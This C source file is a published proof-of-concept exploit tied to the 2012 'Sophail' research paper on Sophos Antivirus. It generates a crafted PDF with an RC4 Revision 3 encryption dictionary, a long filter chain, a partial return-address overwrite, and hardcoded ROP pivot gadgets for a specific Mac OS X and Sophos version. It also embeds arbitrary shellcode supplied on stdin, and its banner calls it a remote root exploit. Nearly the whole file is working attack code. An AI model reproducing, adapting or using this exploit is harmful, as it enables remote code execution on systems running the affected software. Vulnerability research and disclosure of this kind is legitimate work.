#include <stdio.h>
#include <stdint.h>
#include <strings.h>
#include <limits.h>
#include <stdarg.h>
#include <stdbool.h>
#include <zlib.h>

//
// Sophos Antivirus PDF Revision 3 Encryption Exploit.
//
// This exploit accompanies the paper Sophail: Applied attacks against Sophos
// Antivirus. Refer to the paper for further discussion.
//
// Tavis Ormandy <taviso@cmpxchg8b.com>, September 2012.
//
//

enum {
    LOG_DEBUG,
    LOG_INFO,
    LOG_WARN,
    LOG_ERROR,
    LOG_FATAL,
};

typedef struct {
    const char *description;
    uint32_t    orig_return_addr;
    uint32_t    code_pivot_addr[3];
    uint32_t    frame_start_dist;
} target_t;

const target_t kTargetMountainLion = {
    .description        = "Mac OS X 10.8.2 12C60, Sophos 8.0.6, Engine 3.34.0",
    .orig_return_addr   = 0xC008A2E3,
    .frame_start_dist   = 64,
    .code_pivot_addr    = {
        0xC01C2097,     // jmp [esp-128]
        0xC00021F8,     // ebp = *esp
        0xC0001679,     // esp = *ebp+4
    },
};

const target_t *target = &kTargetMountainLion;

static const char *kExploitComment =
    "% SOPHAIL: APPLIED ATTACKS AGAINST SOPHOS ANTIVIRUS";

void log_message(unsigned level, const char *fmt, ...)
{
    va_list ap;

    switch (level) {
        case LOG_DEBUG: fprintf(stderr, "[*] "); break;
        case LOG_INFO:  fprintf(stderr, "[+] "); break;
        case LOG_WARN:  fprintf(stderr, "[!] "); break;
        case LOG_ERROR: fprintf(stderr, "\a[!] "); break;
        case LOG_FATAL: fprintf(stderr, "\a[!] "); break;
    }

    va_start(ap, fmt);
    vfprintf(stderr, fmt, ap);
    va_end(ap);

    // Add newline.
    fputc('\n', stderr);
    return;
}

static size_t create_pdf_header(void)
{
    static const unsigned kPDFMajorVersion = 1;
    static const unsigned kPDFMinorVersion = 4;

    log_message(LOG_DEBUG, "Creating PDF %u.%u header",
                           kPDFMajorVersion,
                           kPDFMinorVersion);

    return fprintf(stdout, "%%PDF-%u.%u\n%s\n",
                           kPDFMajorVersion,
                           kPDFMinorVersion,
                           kExploitComment);
}

// Create a PDF XRef object with the specified number and generation. The
// object will contain a filterchain of the depth specified, and the stream
// will contain the contents of the shellcode stream.
static bool create_xref_object(uint32_t objectnum,
                               uint32_t objectgen,
                               uint32_t filterdepth,
                               FILE *shellcode)
{
    int c = 0;
    int count = 0;

    // Create a new object and open a filter chain.
    fprintf(stdout, "%u %u obj << /Type /XRef /Filter [", objectnum, objectgen);

    log_message(LOG_DEBUG, "Creating xrefs object at %u %u R, filter depth %u",
                           objectnum,
                           objectgen,
                           filterdepth);

    // Create a filter chain of the specified length. The filter doesn't
    // matter, choose one from section 7.4.1 from the PDF specification. I'm
    // using "/Crypt", as it's the shortest in length.
    while (filterdepth--) {
        fprintf(stdout, "/%s", "Crypt");
    }

    // Terminate the filter chain and open a stream object.
    fprintf(stdout, "] >> stream\n");

    log_message(LOG_DEBUG, "Appending object stream for shellcode");

    // Copy the shellcode into the stream.
    while ((c = fgetc(shellcode)) != EOF) {
        fputc(c, stdout);
        count++;
    }

    // Close the stream and terminate the object.
    fprintf(stdout, "\nendstream\nendobj\n");

    log_message(LOG_DEBUG, "%u bytes of shellcode added", count);

    return true;
}

// The trailer object specifies the location of the Encryption parameters and
// the Document ID. The Document ID isn't especially useful, but we need it as
// it's stored in a predictable location and can use it to branch targets to
// pivot code.
static bool create_trlr_object(uint32_t encobjectnum,
                               uint32_t encobjectgen,
                               uint32_t secondpivot,
                               uint32_t thirdpivot)
{
    char documentid[32 + 1];

    // The document id is conveniently placed at a predictable location on the
    // stack, so we use it to store addresses we can reference in pivots. In
    // this way, even though the stack is randomized, we can reference it via
    // [esp-xyz] in gadgets.
    sprintf(documentid, "%08X414141%08X4141414141",
                        __builtin_bswap32(thirdpivot),
                        __builtin_bswap32(secondpivot));

    log_message(LOG_DEBUG, "Generating trailer, document ID will be <%s>",
                           documentid);

    // The document id must be part of a two element array, so we print it
    // twice. The Encrypt parameters are an indirect reference to the RC4
    // object created earlier.
    fprintf(stdout, "trailer << /Encrypt %u %u R /ID [ <%s> <%s> ] >>",
                    encobjectnum,
                    encobjectgen,
                    documentid,
                    documentid);

    return true;
}

// We force a large object list by creating references to deeply nested Xref
// objects. the startxref token requires a byte offset from the start of the
// file.
bool startxref_redirect(uint32_t xrefoffset, uint32_t numxrefs)
{
    unsigned i;

    for (i = 0; i < numxrefs; i++) {
        fprintf(stdout, "startxref %u %%%%EOF\n", xrefoffset);
    }

    log_message(LOG_DEBUG, "Created %u indirect object references",
                           numxrefs);

    return true;
}

// Create the encryption dictionary with the bit length specified, see the
// description of "Standard Encryption Dictionary" in Chapter 3 of the PDF
// specification.
static bool create_arc4_object(uint32_t objectnum,
                               uint32_t objectgen,
                               uint32_t bitlength)
{
    return fprintf(stdout, "%u %u obj <<", objectnum, objectgen)
        +  fprintf(stdout, "/Filter /Standard /Length %u /V 1 /R 3", bitlength)
        +  fprintf(stdout, ">> endobj\n");
}


int main(int argc, char **argv)
{
    uint32_t ret_addr_dest = 0;
    uint32_t ret_addr_diff = 0;
    uint32_t ret_addr_size = 0;
    uint32_t ret_addr_mask = 0xFFFFFFFF;
    uint32_t ret_addr_arc4 = 0x13131313;
    uint32_t header_size   = 0;
    int i;

    log_message(LOG_INFO, "-----------------------------------------------");
    log_message(LOG_INFO, "Sophos Antivirus PDF Rev. 3 Remote Root Exploit");
    log_message(LOG_INFO, "---------------------- taviso@cmpxchg8b.com ---");
    log_message(LOG_INFO, "Target: %s", target->description);

    // First, we need to calculate how many bytes of the return address we need
    // to modify. If we can perform the desired modification with a partial
    // overwrite, this reduces the exploit size and memory requirements.
    //
    // To do this, we XOR the current address and the desired address together,
    // then locate the most significant set bit. Only the different bits are
    // set, so we can measure their similarity.
    ret_addr_diff = target->orig_return_addr ^ target->code_pivot_addr[0];

    // To locate the most significant set bit, I count the number of leading
    // zeroes (clz), then subtract it from the size of the word in bits.
    ret_addr_size = 32 - __builtin_clz(ret_addr_diff);

    // To find the nearest octet boundary, we round this up, then divide by
    // CHAR_BIT.
    ret_addr_size = (ret_addr_size + CHAR_BIT - 1) / CHAR_BIT;

    // Now we know how many bytes we need to overwrite. I would be surprised if
    // a difference much higher than 2^24 will work due to the large size of
    // the PDF objects we would need to build. If you cannot find a good pivot
    // within this range, try using DEPLIB to improve your yield.
    log_message(LOG_DEBUG, "Bit delta between %#x and %#x is %#x",
                           target->orig_return_addr,
                           target->code_pivot_addr[0],
                           ret_addr_diff);

    log_message(LOG_DEBUG, "Nearest octet boundary to %#x is 2**%u-1",
                           ret_addr_diff,
                           ret_addr_size * CHAR_BIT);

    // Now we need to XOR the required address bytes with the round counter to
    // compensate for the RC4 process used in PDF encryption. As described in
    // the PDF 1.4 specification (Algorithm 3.7, step 2), for Revision 3
    // documents this counter will be 20 for each byte.
    //
    // http://partners.adobe.com/public/developer/en/pdf/PDFReference.pdf
    //
    // Therefore, our RC4 mask will always be 0x13131313 shifted the
    // appropriate number of position for the partial overwrite.
    ret_addr_mask >>= 32 - (ret_addr_size << 3);
    ret_addr_arc4 >>= 32 - (ret_addr_size << 3);

    // Use the masks to compensate the target address.
    ret_addr_dest = target->code_pivot_addr[0] & ret_addr_mask;
    ret_addr_dest = ret_addr_dest ^ ret_addr_arc4;

    log_message(LOG_DEBUG, "Address mask is %#x, ARC4 mask is %#x",
                           ret_addr_mask,
                           ret_addr_arc4);
    log_message(LOG_DEBUG, "Compensated pivot for object list will be %#x",
                           ret_addr_dest);


    // Create the PDF header and record the length for byte references.
    header_size = create_pdf_header();

    // Generate the Xref object which contains our filter chain.
    create_xref_object(0, 0, ret_addr_dest - 1, stdin);

    log_message(LOG_DEBUG, "Dumping pivot addresses...");

    // These are the gadgets that allow us to take control of execution.
    // Setting up the stack, removing address constraints, and so on.
    for (i = 0; i < 3; i++) {
        log_message(LOG_DEBUG, "\t#%u %#x", i, target->code_pivot_addr[i]);
    }

    // Print the standard encryption dictionary, and specify the distance into
    // the frame we want to overwrite.
    create_arc4_object(1,
                       0,
                       CHAR_BIT * (target->frame_start_dist + ret_addr_size));

    // Setup the Document ID, used as a convenient trampoline.
    create_trlr_object(1,
                       0,
                       target->code_pivot_addr[1], target->code_pivot_addr[2]);

    // The startxref references trigger the list of objects to be generated
    // that we use.
    startxref_redirect(header_size, 3);

    log_message(LOG_DEBUG, "Finished.");

    return 0;
}
